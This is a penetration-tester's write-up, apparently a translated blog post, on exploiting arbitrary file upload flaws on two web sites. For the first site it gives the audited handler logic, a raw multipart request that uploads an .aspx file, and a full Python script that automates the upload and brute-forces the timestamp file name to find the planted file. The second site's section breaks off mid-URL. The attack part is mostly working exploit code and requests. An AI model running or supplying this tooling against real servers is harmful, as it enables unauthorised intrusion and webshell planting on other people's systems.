
0x01 Site 1: File Upload

Source code leak found

Pulled out my trusty (if trashy) dictionary, scanned, and found a bin.zip information leak, so I tried a code audit of it.

File location: SimpleDataPlatform.SimpleDataPlatform.fileUpload

Locate ProcessRequest, which receives the request. After a batch of parameters is read (and initialized), it enters the HandleFiles method.

Follow HandleFiles for the processing: if dateType=ZBJHSB, the request is handled. dateType is a GET parameter.

The save path is /Uploads/SetData/ZBJHSB, the file name (str) is a timestamp, and the extension (str2) is taken straight from the upload and saved without any restriction.

So this should be an arbitrary file upload. If the method returned the saved path, the site would be done for. Unfortunately, it returns nothing.

Since the method is called fileUpload, I guessed the handler file name might be one of:

fileUpload.aspx

fileUpload.ashx

fileUpload.asmx

fileUploads.aspx

fileUploads.asmx

fileUploads.ashx

Brute-forcing these plus other entries from an existing dictionary, I successfully found the file name: http://xxx.com:6039/FileUploads.ashx

I constructed the upload form directly. The name field of the form part should be left as-is (no field name is checked in the code). After sending the request it returned 200, so maybe the upload went through?

POST /FileUploads.ashx?DataType=ZBJHSB HTTP/1.1
Host: xxx.cn:6039
Content-Length: 195
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---WebKitFormBoundarySVkAJfiOUeRxhsu8
Accept: */*
Connection: close

-----WebKitFormBoundarySVkAJfiOUeRxhsu8
Content-Disposition: form-data; name='File'; filename='1.aspx'
Content-Type: image/jpeg

1111111111111
-----WebKitFormBoundarySVkAJfiOUeRxhsu8--

We saw earlier that the file name is the timestamp in the format yyyyMMddHHmmssfff, with the extension taken directly from the upload. Since we also know the exact save path, all we need to do is brute-force the timestamp file name to get the site. I had never done this before, so it was worth a try.

Brute-forcing the timestamp

Generate the timestamp with PowerShell, then send the request in Burp with the base name in place.

powershell -c Get-Date -Format yyyyMMddHHmmssfff

Then brute-force the last 5 digits, i.e. ssfff (since the machine's clock is not necessarily accurate, sometimes you even have to brute-force 6 digits).

I don't know how long I waited.

I got lucky; I won't say much about what came next.
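The upload plus timestamp brute-force described above, as an added Python example that is not the original post's tooling (the post used PowerShell and Burp Intruder). It assumes the hypothetical target http://xxx.com:6039 from the post, the handler FileUploads.ashx with DataType=ZBJHSB, the form field name File, and the save path /Uploads/SetData/ZBJHSB/<yyyyMMddHHmmssfff><ext>. The candidate names are generated outward from the local send time in both directions, because the server clock may be ahead of or behind ours, and the window is large enough to cover a few seconds of skew.

```python
"""Brute-force a timestamp-named upload (added example, not from the post).

Assumptions (hypothetical, taken from the post): handler FileUploads.ashx,
GET param DataType=ZBJHSB, form field "File", files saved under
/Uploads/SetData/ZBJHSB/<yyyyMMddHHmmssfff><ext>.
"""
from datetime import datetime, timedelta
from typing import Callable, List, Optional, Tuple
import urllib.error
import urllib.request

# .NET "yyyyMMddHHmmss"; the "fff" milliseconds are appended separately
TIMESTAMP_FMT = "%Y%m%d%H%M%S"


def build_multipart(field: str, filename: str, content_type: str,
                    data: bytes, boundary: str) -> Tuple[bytes, str]:
    """Return (body, Content-Type header value) for a one-file multipart form."""
    parts = [
        f"--{boundary}".encode(),
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"'.encode(),
        f"Content-Type: {content_type}".encode(),
        b"",
        data,
        f"--{boundary}--".encode(),
        b"",
    ]
    return b"\r\n".join(parts), f"multipart/form-data; boundary={boundary}"


def stamp(dt: datetime) -> str:
    """Format dt as yyyyMMddHHmmssfff, the format the handler uses for names."""
    return dt.strftime(TIMESTAMP_FMT) + f"{dt.microsecond // 1000:03d}"


def parse_stamp(s: str) -> datetime:
    """Inverse of stamp(): parse a 17-digit yyyyMMddHHmmssfff string."""
    return datetime.strptime(s[:14], TIMESTAMP_FMT).replace(microsecond=int(s[14:17]) * 1000)


def candidate_names(sent_at: datetime, window_ms: int) -> List[str]:
    """Timestamps within +/- window_ms of sent_at, nearest first.

    Searching outward in both directions handles a server clock that is
    either behind or ahead of the attacker's clock.
    """
    names = [stamp(sent_at)]
    for off in range(1, window_ms + 1):
        names.append(stamp(sent_at + timedelta(milliseconds=off)))
        names.append(stamp(sent_at - timedelta(milliseconds=off)))
    return names


def find_uploaded(names: List[str], ext: str,
                  probe: Callable[[str], bool]) -> Optional[str]:
    """Return the first name + ext for which probe() reports a hit, else None."""
    for name in names:
        if probe(name + ext):
            return name + ext
    return None


def http_probe(base_url: str) -> Callable[[str], bool]:
    """Build a probe that GETs base_url/<name> and treats HTTP 200 as a hit."""
    def probe(name: str) -> bool:
        req = urllib.request.Request(base_url.rstrip("/") + "/" + name, method="GET")
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                return resp.status == 200
        except urllib.error.URLError:  # 404/403 etc. raise HTTPError, a URLError
            return False
    return probe


if __name__ == "__main__":
    base = "http://xxx.com:6039"  # hypothetical host from the post
    body, ctype = build_multipart("File", "1.aspx", "image/jpeg", b"1111111111111",
                                  "---WebKitFormBoundarySVkAJfiOUeRxhsu8")
    req = urllib.request.Request(base + "/FileUploads.ashx?DataType=ZBJHSB", data=body,
                                 method="POST",
                                 headers={"Content-Type": ctype,
                                          "X-Requested-With": "XMLHttpRequest"})
    sent_at = datetime.now()  # record before sending: the server stamps on arrival
    with urllib.request.urlopen(req, timeout=10) as resp:
        print("upload status:", resp.status)
    # +/- 5 s covers the ssfff digits the post brute-forced, plus some clock skew
    hit = find_uploaded(candidate_names(sent_at, 5000), ".aspx",
                        http_probe(base + "/Uploads/SetData/ZBJHSB"))
    print("found:", hit)
```

Record the local time immediately before the POST rather than after it, since the server names the file when it handles the request; if the first window misses, widen window_ms rather than guessing a different direction, as the nearest-first ordering already covers both.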

0x02  Site 2: File Upload

Find the upload interface

Opening http://xxxx:880/zwwpt/#/ I found that webpack debug mode had not been turned off. Checking the JS revealed the upload interface:

http://
